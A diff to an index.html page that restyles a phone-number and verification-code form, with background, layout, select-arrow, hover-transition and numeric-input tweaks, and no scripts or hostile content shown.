--- a/index.html
+++ b/index.html
@@ -7,13 +7,14 @@
     <style>
         body {
             font-family: 'Helvetica Neue', Arial, sans-serif;
-            background-color: #f5f5f5;
+            background-color: #ffffff; /* Changed to white background */
             margin: 0;
             padding: 0;
             display: flex;
             justify-content: center;
             align-items: center;
             height: 100vh;
+            overflow: auto; /* Ensure page is scrollable on mobile */
         }
 
         .container {
@@ -24,6 +25,7 @@
             text-align: center;
             width: 100%;
             max-width: 400px;
+            box-sizing: border-box;
         }
 
         .container img {
@@ -65,6 +67,13 @@
             margin-bottom: 10px;
         }
 
+        select {
+            appearance: none; /* Remove default styles */
+            -webkit-appearance: none; /* Remove default styles on iOS */
+            background: #ffffff url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10" viewBox="0 0 10 10"><path d="M0 0l5 5 5-5H0z" fill="#aaa"/></svg>') no-repeat right center;
+            background-size: 10px;
+        }
+
         input[type="checkbox"] {
             margin-right: 10px;
         }
@@ -79,6 +88,7 @@
             font-size: 16px;
             cursor: pointer;
             margin-top: 10px;
+            transition: background-color 0.3s ease; /* Smooth hover effect */
         }
 
         .button:hover {
@@ -90,11 +100,7 @@
             margin-bottom: 20px;
         }
 
-        #verificationContainer {
-            display: none;
-        }
-
-        #finalMessageContainer {
+        #verificationContainer, #finalMessageContainer {
             display: none;
         }
     </style>
@@ -123,7 +129,7 @@
 
         <div class="input-group">
             <label for="phoneNumber">Phone Number</label>
-            <input type="text" id="phoneNumber" placeholder="Phone Number">
+            <input type="text" id="phoneNumber" placeholder="Phone Number" inputmode="numeric">
         </div>
 
         <div>
@@ -140,7 +146,7 @@
 
         <div class="input-group">
             <label for="verificationCode">Code</label>
-            <input type="number" id="verificationCode" placeholder="Code">
+            <input type="number" id="verificationCode" placeholder="Code" inputmode="numeric">
         </div>
 
         <button class="button" onclick="submitVerification()">Submit</button>
